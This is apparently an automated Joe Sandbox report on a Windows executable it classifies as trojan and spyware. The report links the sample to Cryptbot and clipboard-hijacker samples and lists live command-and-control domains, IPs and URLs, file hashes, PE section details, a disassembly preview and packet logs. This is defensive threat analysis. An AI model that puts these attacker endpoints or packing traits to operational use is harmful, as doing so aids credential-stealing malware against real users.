NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    home.twentytk20ht.top
    		185.121.15.192
    		truefalse
      		high
      httpbin.org
      		3.218.7.103
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850false
          		high
          http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0true
          • Avira URL Cloud: malware
          		unknown
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmlE6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://html4/loose.dtdE6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#E6rBvcWFWu.exefalse
                  		high
                  http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0UE6rBvcWFWu.exe, 00000000.00000003.1515251616.0000000001A84000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1556041861.0000000001A85000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://httpbin.org/ipbeforeE6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlE6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#E6rBvcWFWu.exefalse
                        		high
                        http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYE6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3E6rBvcWFWu.exe, 00000000.00000002.1555959761.0000000001A7A000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1516018473.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515970182.0000000001A73000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://curl.se/docs/http-cookies.html#E6rBvcWFWu.exefalse
                          		high
                          https://curl.se/docs/alt-svc.htmlE6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://.cssE6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://.jpgE6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.121.15.192
                                  		home.twentytk20ht.topSpain
                                  		207046REDSERVICIOESfalse
                                  3.218.7.103
                                  		httpbin.orgUnited States
                                  		14618AMAZON-AESUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1580905
                                  Start date and time:2024-12-26 13:01:25 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 55s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:E6rBvcWFWu.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:b6bf5fb735bf9b5b70a90d2c7eeb2996.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.121.15.192gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • fivetk5sb.top/v1/upload.php
                                  8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • twentytk20ht.top/v1/upload.php
                                  x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • fivetk5sb.top/v1/upload.php
                                  WCeE1A6Xyz.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                                  SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  httpbin.orggDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                  • 34.226.108.155
                                  HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 98.85.100.80
                                  8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                                  • 98.85.100.80
                                  7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 98.85.100.80
                                  x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 34.226.108.155
                                  WCeE1A6Xyz.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 98.85.100.80
                                  SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 34.226.108.155
                                  ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 34.226.108.155
                                  WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 34.226.108.155
                                  PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 34.226.108.155
                                  s-part-0035.t-0009.t-msedge.netk6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  BeoHXxE7q3.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  9InQHaM8hT.exeGet hashmaliciousStealcBrowse
                                  • 13.107.246.63
                                  b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.63
                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                  • 13.107.246.63
                                  home.twentytk20ht.topgDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  nRYpZg6i5E.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  RGU8qibimk.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  FMuiLqyqaT.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AMAZON-AESUSxd.mips.elfGet hashmaliciousMiraiBrowse
                                  • 34.206.168.77
                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                  • 44.213.56.197
                                  telnet.arm.elfGet hashmaliciousUnknownBrowse
                                  • 18.209.195.84
                                  telnet.sh4.elfGet hashmaliciousUnknownBrowse
                                  • 35.175.156.177
                                  armv5l.elfGet hashmaliciousMiraiBrowse
                                  • 44.206.15.113
                                  https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                  • 54.225.185.110
                                  armv6l.elfGet hashmaliciousMiraiBrowse
                                  • 18.233.118.120
                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                  • 54.46.167.194
                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                  • 44.193.64.163
                                  armv7l.elfGet hashmaliciousUnknownBrowse
                                  • 34.202.71.116
                                  REDSERVICIOESgDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  WCeE1A6Xyz.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192
                                  PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 185.121.15.192

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):7.981218944308098
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • VXD Driver (31/22) 0.00%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:E6rBvcWFWu.exe
                                  File size:4'478'464 bytes
                                  MD5:b6bf5fb735bf9b5b70a90d2c7eeb2996
                                  SHA1:e558c73bd203dc9db3f548b9631715d281d5fc2e
                                  SHA256:cba47d50bdd548bb66bcb87510fdcc8893e53d4077fa626a0c29d83536439b6f
                                  SHA512:6640917f97a6b668d92dc8c01ebcc3eac7515d9e4fb8e8d5dc994eca7534a9b90e65264fcca869a32055c1bd4e8aa404b7b4d9519850b48eb11c4d2d577d5768
                                  SSDEEP:98304:/jTXkiWmP7OkrMWwDgmuvTeYh9qE1CK1E8fpSFoiQ94Bya8nE:/jTtPEN4R9LYh8fsc0yhE
                                  TLSH:8B2633D25D2781C2C54B323A266FDE1BED0DDDC400BFBDB6F60525785E625A8D8E3092
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................x.D...@... ............................

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x107a000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F577D1F852Ah
                                  sysenter
                                  inc esp
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [00000000h], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [esi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x72b05f0x73.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x72a0000x2b0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc781c00x10xyfieepk
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0xc781700x18xyfieepk
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x7290000x283400ec2089d01812922aeed6e228e947f3a9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x72a0000x2b00x200cc3e9022702e4d1bae3a7f98f38ea941False0.79296875data6.0611403611622485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x72b0000x10000x200d6de82d14e357527731a70b0d9d5c0e8False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x72c0000x38e0000x2003c6d7df6c917d43286f739cee7e79680unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  xyfieepk0xaba0000x1bf0000x1be600a98c26d73dd392e4fc12602be6c04129False0.9940755390646877data7.9542694260581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  lpcplxjb0xc790000x10000x400722a02f29431783fdacfa5197a6cf6a9False0.748046875data5.873978065339511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0xc7a0000x30000x220023311e7752804fddf2c159bf687e47deFalse0.07548253676470588DOS executable (COM)0.7625839267046199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_MANIFEST0xc781d00x256ASCII text, with CRLF line terminators0.5100334448160535

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 26, 2024 13:02:22.240403891 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:22.240453005 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:22.240545034 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:22.335298061 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:22.335328102 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:24.383162975 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:24.383881092 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:24.383898020 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:24.385270119 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:24.385356903 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:24.386842012 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:24.386898994 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:24.387115955 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:24.387121916 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:24.440093994 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:25.043227911 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:25.043346882 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:25.043404102 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:25.287466049 CET49719443192.168.2.93.218.7.103
                                  Dec 26, 2024 13:02:25.287481070 CET443497193.218.7.103192.168.2.9
                                  Dec 26, 2024 13:02:26.843492985 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:26.963135958 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:26.963238001 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:26.964468002 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.084182024 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084203005 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084285021 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.084377050 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084424973 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.084465981 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084476948 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084485054 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084518909 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.084542036 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.084575891 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084587097 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084614992 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084625959 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.084629059 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.084677935 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.204236031 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.204343081 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.204380989 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.204432011 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.204436064 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.204468012 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.204478025 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.204485893 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.204504967 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.204525948 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.204561949 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.204612017 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.245429993 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.245565891 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.365262985 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.365365028 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.409379959 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.409475088 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.525362968 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.613387108 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.613596916 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:27.853534937 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:27.853658915 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.023005009 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.023189068 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.023282051 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.195254087 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.740654945 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.740782022 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.860305071 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.860321045 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.860532045 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.861177921 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.861187935 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.861238003 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.861258030 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.862468958 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.862478971 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.862540007 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.862660885 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.862672091 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.862720966 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.883128881 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.883140087 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.883220911 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.883223057 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.883254051 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.883269072 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.883299112 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:28.980273008 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:28.980298042 CET8049730185.121.15.192192.168.2.9
